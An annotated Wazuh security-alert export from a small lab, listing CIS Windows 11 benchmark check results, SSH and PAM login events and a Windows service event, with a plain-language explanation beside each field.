rule.pci_dss:  ['2.2']
PCI DSS mapping – card‑holder data rules.

rule.nist_800_53:  ['CM.1']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC7.1', 'CC7.2']
SOC‑2 Trust Services Criteria tag.

rule.cis:  ['2.3.10.1']
Maps to CIS benchmark controls – governance folks love this.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534645.2343156
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  sca
Name of the Wazuh decoder that parsed this raw log.

data.sca.type:  check
Scan engine type (script, registry, pkg). Good to know when writing fixes.

data.sca.scan_id:  1948494698
Session ID grouping all checks from the same run.

data.sca.policy:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0
Name of the benchmark policy (e.g., CIS Ubuntu 20.04).

data.sca.check.id:  26042
Unique ID for this single check – copy to search historic runs.

data.sca.check.title:  Ensure 'Network access: Allow anonymous SID/Name translation' is set to 'Disabled'.
Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).

data.sca.check.description:  This policy setting determines whether an anonymous user can request security identifier (SID) attributes for another user, or use a SID to obtain its corresponding user name. The recommended state for this setting is: Disabled.
Detailed what/why of the check – great learning resource.

data.sca.check.rationale:  If this policy setting is enabled, a user with local access could use the well-known Administrator's SID to learn the real name of the built-in Administrator account, even if it has been renamed. That person could then use the account name to initiate a password guessing attack.
Why this matters (compliance / security impact).

data.sca.check.remediation:  To establish the recommended configuration via GP, set the following UI path to Disabled: Computer Configuration\Policies\Windows Settings\Security Settings\Local Policies\Security Options\Network access: Allow anonymous SID/Name translation
Vendor‑recommended fix text – copy‑paste for hardening tickets.

data.sca.check.compliance.cis:  2.3.10.1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.command:  ['powershell "$null = secedit /export /cfg $env:temp/secexport.cfg; $(gc $env:temp/secexport.cfg | Select-String \\"LSAAnonymousNameLookup\\").ToString().Split(\\"=\\")[1].Trim()"']
Shell/registry query used in the test – reproduce it yourself when verifying.

data.sca.check.result:  passed
PASS or FAIL. Red = needs fixing.

data.sca.check.previous_result:  not applicable
Last run’s pass/fail – trend spotting for drift.

location:  sca
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  3
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Low
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  No strong indicators
Short human reason we chose that label.

🎯 Recommended Actions

CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Audit Special Logon' is set to include 'Success'.: Status changed from 'not applicable' to passed

🧠 What happened? CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Audit Special Logon' is set to include 'Success'.: Status changed from 'not applicable' to passed

🔍 Why it's important: No strong indicators

🕒 2025-04-24T22:44:07.471+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Low

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:44:07.471+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Audit Special Logon' is set to include 'Success'.: Status changed from 'not applicable' to passed
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  19015
Numeric ID of the detection rule that fired.

rule.firedtimes:  3
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sca']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.pci_dss:  ['2.2']
PCI DSS mapping – card‑holder data rules.

rule.nist_800_53:  ['CM.1']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC7.1', 'CC7.2']
SOC‑2 Trust Services Criteria tag.

rule.cis:  ['17.5.6']
Maps to CIS benchmark controls – governance folks love this.

rule.cis_csc:  ['8.5']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534647.2346388
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  sca
Name of the Wazuh decoder that parsed this raw log.

data.sca.type:  check
Scan engine type (script, registry, pkg). Good to know when writing fixes.

data.sca.scan_id:  1948494698
Session ID grouping all checks from the same run.

data.sca.policy:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0
Name of the benchmark policy (e.g., CIS Ubuntu 20.04).

data.sca.check.id:  26156
Unique ID for this single check – copy to search historic runs.

data.sca.check.title:  Ensure 'Audit Special Logon' is set to include 'Success'.
Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).

data.sca.check.description:  This subcategory reports when a special logon is used. A special logon is a logon that has administrator-equivalent privileges and can be used to elevate a process to a higher level. Events for this subcategory include: - 4964 : Special groups have been assigned to a new logon. The recommended state for this setting is to include: Success.
Detailed what/why of the check – great learning resource.

data.sca.check.rationale:  Auditing these events may be useful when investigating a security incident.
Why this matters (compliance / security impact).

data.sca.check.remediation:  To establish the recommended configuration via GP, set the following UI path to include Success: Computer Configuration\Policies\Windows Settings\Security Settings\Advanced Audit Policy Configuration\Audit Policies\Logon/Logoff\Audit Special Logon
Vendor‑recommended fix text – copy‑paste for hardening tickets.

data.sca.check.compliance.cis:  17.5.6
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.compliance.cis_csc:  8.5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.command:  ['auditpol.exe /get /subcategory:"Special Logon"']
Shell/registry query used in the test – reproduce it yourself when verifying.

data.sca.check.result:  passed
PASS or FAIL. Red = needs fixing.

data.sca.check.previous_result:  not applicable
Last run’s pass/fail – trend spotting for drift.

location:  sca
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  3
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Low
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  No strong indicators
Short human reason we chose that label.

🎯 Recommended Actions

CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Audit Detailed File Share' is set to include 'Failure'.: Status changed from 'not applicable' to failed

🧠 What happened? CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Audit Detailed File Share' is set to include 'Failure'.: Status changed from 'not applicable' to failed

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:44:10.468+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:44:10.468+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  9
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Audit Detailed File Share' is set to include 'Failure'.: Status changed from 'not applicable' to failed
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  19014
Numeric ID of the detection rule that fired.

rule.firedtimes:  3
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sca']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.pci_dss:  ['2.2']
PCI DSS mapping – card‑holder data rules.

rule.nist_800_53:  ['CM.1']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC7.1', 'CC7.2']
SOC‑2 Trust Services Criteria tag.

rule.cis:  ['17.6.1']
Maps to CIS benchmark controls – governance folks love this.

rule.cis_csc:  ['3.3', '8.5']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534650.2349020
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  sca
Name of the Wazuh decoder that parsed this raw log.

data.sca.type:  check
Scan engine type (script, registry, pkg). Good to know when writing fixes.

data.sca.scan_id:  1948494698
Session ID grouping all checks from the same run.

data.sca.policy:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0
Name of the benchmark policy (e.g., CIS Ubuntu 20.04).

data.sca.check.id:  26157
Unique ID for this single check – copy to search historic runs.

data.sca.check.title:  Ensure 'Audit Detailed File Share' is set to include 'Failure'.
Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).

data.sca.check.description:  This subcategory allows you to audit attempts to access files and folders on a shared folder. Events for this subcategory include: - 5145: network share object was checked to see whether client can be granted desired access. The recommended state for this setting is to include: Failure.
Detailed what/why of the check – great learning resource.

data.sca.check.rationale:  Auditing the Failures will log which unauthorized users attempted (and failed) to get access to a file or folder on a network share on this computer, which could possibly be an indication of malicious intent.
Why this matters (compliance / security impact).

data.sca.check.remediation:  To establish the recommended configuration via GP, set the following UI path to include Failure: Computer Configuration\Policies\Windows Settings\Security Settings\Advanced Audit Policy Configuration\Audit Policies\Object Access\Audit Detailed File Share
Vendor‑recommended fix text – copy‑paste for hardening tickets.

data.sca.check.compliance.cis:  17.6.1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.compliance.cis_csc:  3.3,8.5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.command:  ['auditpol.exe /get /subcategory:"Detailed File Share"']
Shell/registry query used in the test – reproduce it yourself when verifying.

data.sca.check.result:  failed
PASS or FAIL. Red = needs fixing.

data.sca.check.previous_result:  not applicable
Last run’s pass/fail – trend spotting for drift.

location:  sca
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Audit File Share' is set to 'Success and Failure'.: Status changed from 'not applicable' to failed

🧠 What happened? CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Audit File Share' is set to 'Success and Failure'.: Status changed from 'not applicable' to failed

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:44:13.568+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:44:13.568+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  9
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Audit File Share' is set to 'Success and Failure'.: Status changed from 'not applicable' to failed
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  19014
Numeric ID of the detection rule that fired.

rule.firedtimes:  4
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sca']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.pci_dss:  ['2.2']
PCI DSS mapping – card‑holder data rules.

rule.nist_800_53:  ['CM.1']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC7.1', 'CC7.2']
SOC‑2 Trust Services Criteria tag.

rule.cis:  ['17.6.2']
Maps to CIS benchmark controls – governance folks love this.

rule.cis_csc:  ['3.3', '8.5']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534653.2351868
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  sca
Name of the Wazuh decoder that parsed this raw log.

data.sca.type:  check
Scan engine type (script, registry, pkg). Good to know when writing fixes.

data.sca.scan_id:  1948494698
Session ID grouping all checks from the same run.

data.sca.policy:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0
Name of the benchmark policy (e.g., CIS Ubuntu 20.04).

data.sca.check.id:  26158
Unique ID for this single check – copy to search historic runs.

data.sca.check.title:  Ensure 'Audit File Share' is set to 'Success and Failure'.
Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).

data.sca.check.description:  This policy setting allows you to audit attempts to access a shared folder. The recommended state for this setting is: Success and Failure. Note: There are no system access control lists (SACLs) for shared folders. If this policy setting is enabled, access to all shared folders on the system is audited.
Detailed what/why of the check – great learning resource.

data.sca.check.rationale:  In an enterprise managed environment, workstations should have limited file sharing activity, as file servers would normally handle the overall burden of file sharing activities. Any unusual file sharing activity on workstations may therefore be useful in an investigation of potentially malicious activity.
Why this matters (compliance / security impact).

data.sca.check.remediation:  To establish the recommended configuration via GP, set the following UI path to Success and Failure: Computer Configuration\Policies\Windows Settings\Security Settings\Advanced Audit Policy Configuration\Audit Policies\Object Access\Audit File Share
Vendor‑recommended fix text – copy‑paste for hardening tickets.

data.sca.check.compliance.cis:  17.6.2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.compliance.cis_csc:  3.3,8.5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.command:  ['auditpol.exe /get /subcategory:"File Share"']
Shell/registry query used in the test – reproduce it yourself when verifying.

data.sca.check.result:  failed
PASS or FAIL. Red = needs fixing.

data.sca.check.previous_result:  not applicable
Last run’s pass/fail – trend spotting for drift.

location:  sca
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

PAM: Login session closed.

🧠 What happened? PAM: Login session closed.

🔍 Why it's important: No strong indicators

🕒 2025-04-24T22:44:14.534+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Low

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:44:14.534+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  PAM: Login session closed.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  5502
Numeric ID of the detection rule that fired.

rule.firedtimes:  1
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['pam', 'syslog']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.pci_dss:  ['10.2.5']
PCI DSS mapping – card‑holder data rules.

rule.gpg13:  ['7.8', '7.9']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.gdpr:  ['IV_32.2']
General Data Protection Regulation relevance.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AU.14', 'AC.7']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  000
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  server1
Hostname of the source machine. Handy when matching with AD or your CMDB.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534654.2354908
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

full_log:  2025-04-24T22:44:13.230035+00:00 server1 sshd[3349]: pam_unix(sshd:session): session closed for user simba
The complete raw log message before parsing – last‑resort truth for deep dives.

predecoder.program_name:  sshd
Process that originally wrote the log line (e.g., sshd, sudo).

predecoder.timestamp:  2025-04-24T22:44:13.230035+00:00
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

decoder.parent:  pam
Parent decoder used – for nested parsing.

decoder.name:  pam
Name of the Wazuh decoder that parsed this raw log.

data.dstuser:  simba
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  /var/log/auth.log
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  3
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Low
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  No strong indicators
Short human reason we chose that label.

🎯 Recommended Actions

CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Audit Other Object Access Events' is set to 'Success and Failure'.: Status changed from 'not applicable' to failed

🧠 What happened? CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Audit Other Object Access Events' is set to 'Success and Failure'.: Status changed from 'not applicable' to failed

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:44:19.058+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:44:19.058+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  9
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Audit Other Object Access Events' is set to 'Success and Failure'.: Status changed from 'not applicable' to failed
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  19014
Numeric ID of the detection rule that fired.

rule.firedtimes:  5
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sca']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.pci_dss:  ['2.2']
PCI DSS mapping – card‑holder data rules.

rule.nist_800_53:  ['CM.1']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC7.1', 'CC7.2']
SOC‑2 Trust Services Criteria tag.

rule.cis:  ['17.6.3']
Maps to CIS benchmark controls – governance folks love this.

rule.cis_csc:  ['8.5']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534659.2355301
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  sca
Name of the Wazuh decoder that parsed this raw log.

data.sca.type:  check
Scan engine type (script, registry, pkg). Good to know when writing fixes.

data.sca.scan_id:  1948494698
Session ID grouping all checks from the same run.

data.sca.policy:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0
Name of the benchmark policy (e.g., CIS Ubuntu 20.04).

data.sca.check.id:  26159
Unique ID for this single check – copy to search historic runs.

data.sca.check.title:  Ensure 'Audit Other Object Access Events' is set to 'Success and Failure'.
Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).

data.sca.check.description:  This policy setting allows you to audit events generated by the management of task scheduler jobs or COM+ objects. For scheduler jobs, the following are audited: - Job created. - Job deleted. - Job enabled. - Job disabled. - Job updated. For COM+ objects, the following are audited: - Catalog object added. - Catalog object updated. - Catalog object deleted. The recommended state for this setting is: Success and Failure.
Detailed what/why of the check – great learning resource.

data.sca.check.rationale:  The unexpected creation of scheduled tasks and COM+ objects could potentially be an indication of malicious activity. Since these types of actions are generally low volume, it may be useful to capture them in the audit logs for use during an investigation.
Why this matters (compliance / security impact).

data.sca.check.remediation:  To establish the recommended configuration via GP, set the following UI path to Success and Failure: Computer Configuration\Policies\Windows Settings\Security Settings\Advanced Audit Policy Configuration\Audit Policies\Object Access\Audit Other Object Access Events
Vendor‑recommended fix text – copy‑paste for hardening tickets.

data.sca.check.compliance.cis:  17.6.3
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.compliance.cis_csc:  8.5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.command:  ['auditpol.exe /get /subcategory:"Other Object Access Events"']
Shell/registry query used in the test – reproduce it yourself when verifying.

data.sca.check.result:  failed
PASS or FAIL. Red = needs fixing.

data.sca.check.previous_result:  not applicable
Last run’s pass/fail – trend spotting for drift.

location:  sca
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Software protection service scheduled successfully.

🧠 What happened? Software protection service scheduled successfully.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:44:22.725+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:44:22.725+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Software protection service scheduled successfully.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  60642
Numeric ID of the detection rule that fired.

rule.firedtimes:  11
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['windows', 'windows_application']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534662.2358595
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Security-SPP
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {E23B33B0-C8C9-472C-A5F9-F2BDFEA0F156}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventSourceName:  Software Protection Platform Service
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  16384
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  0
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x80000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:43:17.4781170Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  2419
Incremental log record number – handy for timeline order.

data.win.system.processID:  16152
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Application
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Successfully scheduled Software Protection service for re-start at 2025-04-25T22:31:17Z. Reason: RulesEngine."
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.data:  2025-04-25T22:31:17Z, RulesEngine
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

sshd: authentication success.

🧠 What happened? sshd: authentication success.

🔍 Why it's important: Moderate‑risk ATT&CK technique

🕒 2025-04-24T22:44:24.545+0000 | 🧠 MITRE: ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access', 'Lateral Movement'] – ['Valid Accounts', 'Remote Services'] [T1078] [T1021]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1078 – Valid Accounts

[Medium] T1021 – Remote Services

🔍 Full Alert Details
timestamp:  2025-04-24T22:44:24.545+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  sshd: authentication success.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  5715
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1078', 'T1021']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access', 'Lateral Movement']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Valid Accounts', 'Remote Services']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  2
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['syslog', 'sshd', 'authentication_success']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_32.2']
General Data Protection Regulation relevance.

rule.gpg13:  ['7.1', '7.2']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AU.14', 'AC.7']
NIST 800‑53 mapping – US Fed controls.

rule.pci_dss:  ['10.2.5']
PCI DSS mapping – card‑holder data rules.

rule.tsc:  ['CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  000
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  server1
Hostname of the source machine. Handy when matching with AD or your CMDB.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534664.2360177
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

full_log:  2025-04-24T22:44:23.581338+00:00 server1 sshd[3411]: Accepted password for simba from 192.168.6.135 port 42842 ssh2
The complete raw log message before parsing – last‑resort truth for deep dives.

predecoder.program_name:  sshd
Process that originally wrote the log line (e.g., sshd, sudo).

predecoder.timestamp:  2025-04-24T22:44:23.581338+00:00
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

decoder.parent:  sshd
Parent decoder used – for nested parsing.

decoder.name:  sshd
Name of the Wazuh decoder that parsed this raw log.

data.srcip:  192.168.6.135
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.srcport:  42842
Source TCP/UDP port seen – can confirm outbound SMB / RDP, etc.

data.dstuser:  simba
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  /var/log/auth.log
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  3
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Moderate‑risk ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

PAM: Login session opened.

🧠 What happened? PAM: Login session opened.

🔍 Why it's important: No strong indicators

